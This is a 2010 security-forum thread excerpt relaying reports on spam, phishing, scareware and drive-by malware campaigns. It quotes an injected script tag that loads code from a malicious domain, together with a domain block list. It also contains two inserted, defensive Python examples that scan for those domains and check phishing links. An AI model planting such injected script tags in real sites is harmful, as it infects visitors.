SPAM frauds, fakes, and other MALWARE deliveries...


2072 replies to this topic

#301 AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 08 May 2010 - 08:55 PM

FYI...

Koobface gang... (inside Facebook) scareware serving compromised sites
- http://ddanchev.blog...-scareware.html
May 08, 2010 - "... Immediately after the suspension of their automatically registered Blogspot accounts, the gang once again proved that it has contingency plans in place, and started pushing links to compromised sites, in a combination with an interesting "visual social engineering trick", across Facebook, which sadly works pretty well, in the sense that it completely undermines the "don't click on links pointing to unknown sites" type of security tips... This active use of the "trusted reputation chain", just like the majority of social engineering centered tactics of the gang, aims to exploit the ubiquitous weak link in the face of the average Internet user... Clicking on this link inside Facebook leads to... a Koobface bogus video...
* Detection rates:
- setup.exe - Mal/Koobface-E; W32/VBTroj.CXNF - Result: 7/41 (17.08%)
- RunAV_312s2.exe - VirTool.Win32.Obfuscator.hg!b (v); High Risk Cloaked Malware - Result: 4/41 (9.76%) ..."

(More detail and info links at the //ddanchev URL above.)

:ph34r: <_<

Edited by AplusWebMaster, 08 May 2010 - 08:55 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.



#302 AplusWebMaster

Posted 09 May 2010 - 10:50 AM

FYI...

Mothers Day SPAM...
- http://blog.trendmic...ebr...s’-day/
"May 9 is Mothers’ Day for most countries all over the world. As a perfect gift on this particular holiday, spammers decided to honor mothers by spamming e-cards from supposedly legitimate greeting card companies to distribute their malicious wares... an email in HTML format using a template from Florists’ Transworld Delivery (FTD), a floral wire service... the usual short spam in plain text format with a URL that redirects the user to a malicious site... Though the URLs in the spam are not accessible, users should remember that spammers will try just about anything to encourage people to purchase the products they advertise..."

(Screenshots available at the URL above.)

:ph34r:



#303 AplusWebMaster

Posted 10 May 2010 - 03:01 PM

FYI...

Google Groups - malicious SPAM...
- http://www.m86securi...trace.1338~.asp
May 9, 2010 - "... large scale spam campaign, with links leading to Fake Anti-virus "scareware". The spam is originating from the Pushdo botnet, which is notorious for these sorts of malicious campaigns. The spam is not that unusual, rather it comes disguised as an 'administrator' message suggesting your mailbox settings need to be updated... The links all lead to various Google Groups pages where files called setup.zip have simply been uploaded by the attackers..."

(Screenshot available at the URL above.)

:ph34r: :ph34r:



#304 AplusWebMaster

Posted 11 May 2010 - 06:42 AM

FYI...

Fake Win7 compatibility checker - more malware in SPAM...
- http://www.theregist...11/win7_trojan/
11 May 2010 - "... The malware comes as a zip-based attachment to email messages supposedly offering "help" on upgrading Windows boxes. But this "Windows 7 Upgrade Advisor Setup" assistant offers only a Trojan, instead of the promised compatibility checking tool. Windows users who open and run the application end up with systems compromised with a backdoor that allows hackers to insert other viruses and spyware... The main lessons from the attack are that the contents of unsolicited messages are best ignored and, secondly, that virus writers are always trying out new social engineering tricks to dupe the unwary..."

:ph34r: <_<



#305 AplusWebMaster

Posted 11 May 2010 - 09:37 AM

FYI...

TorrentReactor.net - drive-by-download - leads to exploit
- http://blogs.paretol...ads-to-exploit/
May 10, 2010 - "The popular website torrentreactor .net is home of a drive-by download. I tested it this morning and the exploit is still live, so please be careful... Wepawet report* indicates “Multiple Adobe Reader and Acrobat buffer overflows”... What’s happening is probably a third party advertisement site that promotes on TorrentReactor has been compromised... The malicious PDF is detected by 6/40 vendors on VirusTotal**..."
* http://wepawet.isecl...1...777&type=js
** http://www.virustota...0a1b-1273512771
File 9E5F92DB78287D690C62AD9DBD6CAA64. received on 2010.05.10 17:32:51 (UTC)
Result: 6/40 (15.00%)

- http://ddanchev.blog...-crimeware.html
May 11, 2010 - "...appears to be taking place through a malicious ad serving exploits using the NeoSploit kit, which ultimately drops a ZeuS crimeware sample hosted within a fast-flux botnet..."

- http://google.com/sa...entReactor.net/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-13. Malicious software includes 13 trojan(s), 10 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine. Malicious software is hosted on 16 domain(s), including netping.dyndns.dk/, endroiturlredirect.com/, burgsiutrehosa.com/. 13 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fulldls.com/, shtraff.ignorelist.com/, yieldmanager.com/..."

:ph34r: <_<

Edited by AplusWebMaster, 15 May 2010 - 08:42 AM.



#306 AplusWebMaster

Posted 17 May 2010 - 09:44 AM

FYI...

Windows “activation” ransomware
- http://sunbeltblog.b...ransomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."

(Screenshots available at the URL above.)

:ph34r: <_<

Edited by AplusWebMaster, 17 May 2010 - 09:48 AM.



#307 AplusWebMaster

Posted 19 May 2010 - 03:55 AM

FYI... 'suggest BLOCK THEM ALL...

- http://community.web...gain_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)

- http://www.malwaredo...ordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...

GoDaddy attacks continue...
- http://blog.sucuri.n...at-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
http://blog.sucuri.n...malware-at.html
You can clean up using this script:
http://blog.sucuri.n...for-latest.html
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.n...malware-at.html
May 12, 2010
___

- http://google.com/sa...kdfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/sa...=losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/sa...olasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."

- http://google.com/sa...studioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."

- http://google.com/sa...zettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."

:ph34r: <_<

Edited by AplusWebMaster, 19 May 2010 - 02:06 PM.

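The injected tag quoted in this post is the kind of thing a site owner can check for on their own server files. The following is an added example, not code from the post nor from Sucuri, Websense or MalwareDomains: a small Python scanner that pulls every external `<script src=...>` out of PHP/HTML files and reports those loading from the domains named in the reports above. The sample file contents are constructed here so the block runs stand-alone; the `BLOCKLIST`, `scan_tree` and `scan_samples` names are this example's own.

```python
"""Find <script src=...> tags that load from known-bad hosts in web files."""
import re
from pathlib import Path
from urllib.parse import urlsplit

# Domains named in the Websense / Sucuri / MalwareDomains reports quoted above.
BLOCKLIST = {
    "kdjkfjskdfjlskdjf.com",
    "losotrana.com",
    "holasionweb.com",
    "indesignstudioinfo.com",
    "zettapetta.com",
}

# <script ... src="..."> with double, single or no quotes, case-insensitive.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def script_hosts(text):
    """Return (line_number, src, host) for every <script src> in text.

    host is '' for a relative src (same-origin), so only absolute or
    protocol-relative URLs are ever matched against the blocklist."""
    found = []
    for m in SCRIPT_SRC.finditer(text):
        src = next(g for g in m.groups() if g is not None)
        lineno = text.count("\n", 0, m.start()) + 1
        if "://" in src or src.startswith("//"):
            host = (urlsplit(src).hostname or "").lower()
        else:
            host = ""
        found.append((lineno, src, host))
    return found


def is_blocked(host):
    """True if host is a blocklisted domain or any subdomain of one."""
    return any(host == bad or host.endswith("." + bad) for bad in BLOCKLIST)


def scan_text(name, text):
    """(name, line, src) for each script tag in text that loads from a blocked host."""
    return [(name, lineno, src)
            for lineno, src, host in script_hosts(text)
            if host and is_blocked(host)]


def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a document root and scan every file with one of the given suffixes."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits.extend(scan_text(str(path), path.read_text(errors="replace")))
    return hits


# Constructed sample files (not real infected files) for a stand-alone run.
SAMPLE_FILES = {
    "index.php": '<?php echo "hi"; ?>\n<script src="http://losotrana.com/js.php"></script>\n',
    "about.html": "<html><script src='//cdn.holasionweb.com/x.js'></script></html>\n",
    "clean.php": '<script src="/js/app.js"></script>\n'
                 '<script src="https://example.org/lib.js"></script>\n',
}


def scan_samples():
    """Run the scanner over the constructed samples."""
    hits = []
    for name, text in SAMPLE_FILES.items():
        hits.extend(scan_text(name, text))
    return hits


if __name__ == "__main__":
    for name, lineno, src in scan_samples():
        print(f"{name}:{lineno}: script loaded from blocklisted host: {src}")
```

`scan_tree("/path/to/docroot")` runs the same check over a real directory; only a blocklisted host, not the string "js.php" or any particular path, triggers a report, so renamed copies of the same injection on the same domains are still caught, while relative same-origin scripts never are.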


#308 AplusWebMaster

Posted 20 May 2010 - 06:34 AM

FYI...

Twitter attack - in progress...
- http://www.f-secure....s/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."

:ph34r: <_<



#309 AplusWebMaster

Posted 21 May 2010 - 01:10 PM

FYI...

AutoRun worms still alive...
- http://blog.trendmic...ize-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmic...movable-drives/

:ph34r: :ph34r:



#310 AplusWebMaster

Posted 23 May 2010 - 06:17 AM

FYI...

Beware the trader bearing free gifts...

- http://gizmodo.com/5544593
May 21, 2010 - "... lecturing in the importance of protecting PCs..."

- http://preview.tinyurl.com/2bjdjau
22 May 2010 - "... over 99 different malicious applications were used in this and last weekend's attacks."

:ph34r: :ph34r:




#311 AplusWebMaster

Posted 26 May 2010 - 05:04 PM

FYI...

FIFA fans - Scam targets
- http://blog.trendmic...gets-fifa-fans/
May 26, 2010 - "The upcoming “2010 FIFA World Cup” in South Africa is one of the most highly anticipated events in sports history today... two separate SPAM runs leveraging the said event. The first spam sample had a .DOC file attachment that informs recipients of a supposed new contest called “Final Draw” organized in part by the FIFA Organizing Committee. It also tells the recipient of a US$550,000 prize. To claim this, however, the “winner” must immediately coordinate with the releasing agent via the contact information indicated in the email. The email also asks the recipient to give out personal information... This asks recipients to divulge specific information in relation to a fund transfer transaction amounting to a whopping US$10.5 million. Upon agreeing to the proposal, the recipient should supposedly get 30 percent of the said amount. Note that this tactic is reminiscent of the infamous 419 or Nigerian scam, which persuaded users to send cash by promising them a large amount of money in return for their cooperation... In fact, FIFA sternly warned fans of similar online scams*..."
* http://www.pcworld.c...FA_Tickets.html

- http://www.symantec....aise-their-game
May 27, 2010

- http://www.f-secure....s/00001964.html
June 9, 2010

:ph34r: <_<

Edited by AplusWebMaster, 10 June 2010 - 11:04 AM.



#312 AplusWebMaster

Posted 27 May 2010 - 02:51 AM

FYI...

44 million stolen gaming credentials uncovered
- http://www.symantec....tials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."

* http://www.symantec....-052013-2257-99

** http://www.symantec....-111201-3853-99

:ph34r:



#313 AplusWebMaster

Posted 27 May 2010 - 02:59 AM

FYI...

Credit union fraud via phish for U.S. Servicemen and Vets
- http://www.symantec....-veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http ://255.255.255.255/) based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."

- http://krebsonsecuri...y-credit-union/
May 27, 2010 - "... cyber thieves stole more than $100,000 from a small credit union in Salt Lake City last week..."

:ph34r: <_<

Edited by AplusWebMaster, 27 May 2010 - 02:47 PM.

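The two checks in the tips quoted above ("check the URL of the website and make sure that it belongs to the brand", and the warning about IP-based URLs such as http://255.255.255.255/) can be made mechanical. The following is an added example, not code from the post or from Symantec: a Python function that flags a link as suspicious when its host is an IP literal or is not the brand's domain or a subdomain of it. The brand domain and the sample links are constructed placeholders, not a real credit union.

```python
"""Decide whether a link really belongs to the brand it claims to be."""
import ipaddress
from urllib.parse import urlsplit


def host_of(url):
    """Lower-cased host part of a URL, trailing dot removed ('' if there is none)."""
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def is_ip_literal(host):
    """True for IP-based hosts such as 255.255.255.255 (the form named in the post)."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def belongs_to_brand(host, brand_domain):
    """True only if host is the brand domain itself or a subdomain of it.

    The brand domain must be the suffix of the host: a lookalike such as
    brand.example.attacker.test merely *contains* it and is rejected."""
    brand_domain = brand_domain.lower().rstrip(".")
    return host == brand_domain or host.endswith("." + brand_domain)


def assess_link(url, brand_domain):
    """Return 'ok' or a short reason why the link should not be trusted."""
    host = host_of(url)
    if not host:
        return "suspicious: no host in URL"
    if is_ip_literal(host):
        return "suspicious: IP-based URL"
    if not belongs_to_brand(host, brand_domain):
        return f"suspicious: {host} is not under {brand_domain}"
    return "ok"


# Constructed samples; BRAND is a placeholder, not any real institution's domain.
BRAND = "examplecu.example"
SAMPLE_LINKS = [
    "http://255.255.255.255/unlock",                  # IP-based, as in the post
    "https://online.examplecu.example/login",         # genuine subdomain of the brand
    "http://examplecu.example.account-unlock.test/",  # brand name used as a prefix
    "https://examplecu-example.test/login",           # hyphenated lookalike
]


def assess_samples():
    """Verdict for each constructed sample link."""
    return {url: assess_link(url, BRAND) for url in SAMPLE_LINKS}


if __name__ == "__main__":
    for url, verdict in assess_samples().items():
        print(f"{verdict:60} {url}")
```

The suffix test in `belongs_to_brand` is the part people get wrong by hand: a host that starts with the brand name reads as legitimate in a narrow address bar, which is exactly the trick the quoted tips are warning about.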


#314 AplusWebMaster

Posted 28 May 2010 - 07:44 PM

FYI...

boingboing .com spews drive-by-download malware...
- http://news.cnet.com...005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize...om-malware.html

:ph34r: :ph34r:



#315 AplusWebMaster

Posted 30 May 2010 - 05:54 AM

FYI...

Facebook attacked again...
- http://community.web...n-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page looks like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to log in..."
(Screenshots available at the URL above.)

- http://blog.webroot....ve-by-download/
May 28, 2010

- http://www.sophos.co...facebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."

:ph34r: <_<

Edited by AplusWebMaster, 01 June 2010 - 04:51 AM.

